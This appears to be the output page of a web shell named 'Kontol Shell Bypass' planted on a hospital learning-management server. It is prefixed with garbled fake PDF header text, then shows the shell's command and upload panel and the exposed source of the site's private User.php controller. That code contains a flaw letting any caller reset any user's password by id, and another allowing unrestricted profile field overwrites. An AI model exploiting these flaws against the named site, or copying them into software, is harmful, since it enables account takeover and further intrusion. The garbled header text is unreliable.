%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :
ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/lms/lms/api/application/controllers/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/lms/lms/api/application/controllers/User.php
<?php
class User extends MY_Controller {
    function __construct() {
        parent::__construct();
        not_logged_res();
        $this->load->model("dataset_model", "dataset");
		$this->load->model("user_model", "user");
    }
	
	function init(){
		$this->checkAccess(['manage_users', 'my_users']);
		$data=$this->user->lists(!$this->is_access("manage_users"));
		$data['user_types']=user_types();
		$data['modules']=$this->user->system_modules();
		$data['modules_groups']=$this->user->system_modules_groups();
        $data['regional_officers']=$this->user->regional_officers();
        $data['all_managers']=$this->user->all_managers();
        $data['data_set_users']=$this->user->data_set_users();
		$this->json_data($data);
	}
	
	function lists(){
		$this->checkAccess(['manage_users', 'my_users']);
		$data=$this->user->lists(!$this->is_access("manage_users"));
		$this->json_data($data);
	}

	function active_users($type=''){
		$data['result']=$this->user->active_users(true, $type);
		$this->json_data($data);
	}
	
	function save(){
		if(!IS_ADMIN){
			die;
		}
		$this->checkAccess('manage_users');
		$inf=array('success'=>'F', 'msg'=>'Error!');
		$post=trim_array($this->input->post());
		
		$id=$post['id']=intval($post['id']);
		$this->form_validation->set_rules('name', 'Name', 'required', $this->req);
		$this->form_validation->set_rules('username', 'Username', "is_unique[users.username.id!='$id']", $this->req);
		$this->form_validation->set_rules('email', 'Email', "required|valid_email|is_unique[users.email.id!='$id']", $this->req);
		$this->form_validation->set_rules('mobile', 'Mobile No.', "required|integer|exact_length[10]", $this->req);
		$this->form_validation->set_rules('type', 'User Type', "required", $this->req);
		if(!$id){
			$this->form_validation->set_rules('password', 'Password', "required", $this->req);
		}
		
		if(@$this->form_validation->run() == FALSE){
			$inf['errors']=$this->form_validation->get_errors();
			$inf['msg']=reset($inf['errors']);
		}else{
			$data=filter_value($post, array('id', 'parent_id', 'name', 'email', 'mobile', 'username', 'type', 'status', 'lead_restrict', 'reporting_type', 'campus_offline_user', 'whatsapp_instance', 'allowed_ips'));
			if($post['password']){
				$data['password']=encrypt_password($post['password']);
			}
			if($post['type']!='USER'){
				//$data['parent_id']=0;
			}
			
			$data['modules']='';
			if($post['modules']){
				$data['modules']=implode(",", $post['modules']);
			}
			
			if($user_id=$this->common->save($data, "users")){
                if($post['clone_data_set_id']){
                    $ds=$this->db->get_where("leads_data_sets", ['id'=>$post['clone_data_set_id']])->row_array();
					if($ds){
						unset($ds['id']);
						$ds['title']=$ds['title'].' clone';
						$dsid=$this->dba->save("leads_data_sets", $ds);
						$this->dba->save("users", ['id'=>$user_id, 'data_set_id'=>$dsid]);
					}
                }

				$inf['id']=$user_id;
				$inf['success']='T';
				$inf['msg']='User '.($id?'updated':'added').' successfully';

				if($data['type']=='REGIONAL_OFFICER'){
					$inf['regional_officers']=$this->user->regional_officers();
				}
			}
		}
		$this->json_data($inf);
	}
	
	function detail($id=USER_ID){
		$dtl=$this->user->detail($id);
		$this->json_data($dtl);
	}
	
	function delete(){
		if(!IS_ADMIN){
			die;
		}
		$this->checkAccess('manage_users');
		$inf=array('success'=>'F', 'msg'=>'Can not deleted!');
		$id=intval($this->input->post('id'));
		if($this->user->delete($id)){
			$inf['success']='T';
			$inf['msg']="User deleted successfully";
		}
		$this->json_data($inf);
	}
	
	/** **/
	function update_profile(){
		$post=trim_array($this->input->post());
		$inf=array('success'=>'F', 'msg'=>'Error!');
		if($post){
			$id=USER_ID;
			$this->form_validation->set_rules('name', 'Name', 'required', $this->req);
			$this->form_validation->set_rules('username', 'Username', "is_unique[users.username.id!='$id']", $this->req);
			$this->form_validation->set_rules('email', 'Email', "required|valid_email|is_unique[users.email.id!='$id']", $this->req);
			$this->form_validation->set_rules('mobile', 'Mobile No.', "required|integer|exact_length[10]", $req);
			
			$inf['success']='F';
			if(@$this->form_validation->run() == FALSE){
                $inf['errors']=$this->form_validation->get_errors();
            }else{
				$post['id']=$id;
				if($id=$this->common->save($post, "users")){
					$inf['id']=$id;
					$inf['success']='T';
					$inf['msg']='Profile updated successfully';
				}
            }
			$this->json_data($inf);
		}
	}
	
	function change_pass(){
		$post=trim_array($this->input->post());
		
		if($post){
			$this->form_validation->set_rules('password', 'Password', 'required', $this->req);
			$this->form_validation->set_rules('repassword', 'Confirm Password', 'required|callback_passwordmatch', $this->req);
			
			$post['success']='F';
			if(@$this->form_validation->run() == FALSE){
                $post['errors']=$this->form_validation->get_errors();
            }else{
				$inf=array('id'=>$post['id']?intval($post['id']):USER_ID, 'password'=>encrypt_password($post['password']));
				if($this->common->save($inf, "users")){
					$post['success']='T';
				}
            }
			$this->json_data($post);
		}
	}
	
	function passwordmatch($v){
		$post=trim_array($this->input->post());
		if($post['password']!=$post['repassword']){
			$this->form_validation->set_message('passwordmatch', 'Password mismatch!');
			return FALSE;
		}else{
			return TRUE;
		}
	}
	
	/** Logo **/
	function upload_logo(){
		$inf=array('success'=>'F', 'msg'=>'Invalid image!');
		if(!check_image_ext($_FILES['logo']['name'])){
			$this->json_data($inf);
		}
		
		$file=('comp-logo-'.time().'-'.USER_ID).'.'.get_ext($_FILES['logo']['name']);
		if(move_uploaded_file($_FILES['logo']['tmp_name'], UP_PATH.'users/logos/'.$file)){
			$udtl=$this->user->detail(USER_ID, 'logo');
			if($this->common->save(array('id'=>USER_ID, 'logo'=>$file), "users")){
				if($udtl['logo']){
					del_file(UP_PATH.'users/logos/'.$udtl['logo']);
				}
				$inf['logo']=$file;
				$inf['success']='T';
				$inf['msg']='Logo uploaded';
			}
		}
		
		$this->json_data($inf);
	}
	
	function delete_logo(){
		$inf=array('success'=>'F', 'msg'=>'Error!');
		$udtl=$this->user->detail(USER_ID, 'logo');
		if($udtl['logo']){
			if($this->common->save(array('id'=>USER_ID, 'logo'=>''), "users")){
				del_file(UP_PATH.'users/logos/'.$udtl['logo']);
				$inf['success']='T';
				$inf['msg']='Logo deleted';
			}
		}
		
		$this->json_data($inf);
	}
	/** \ **/
}

//EOF

Kontol Shell Bypass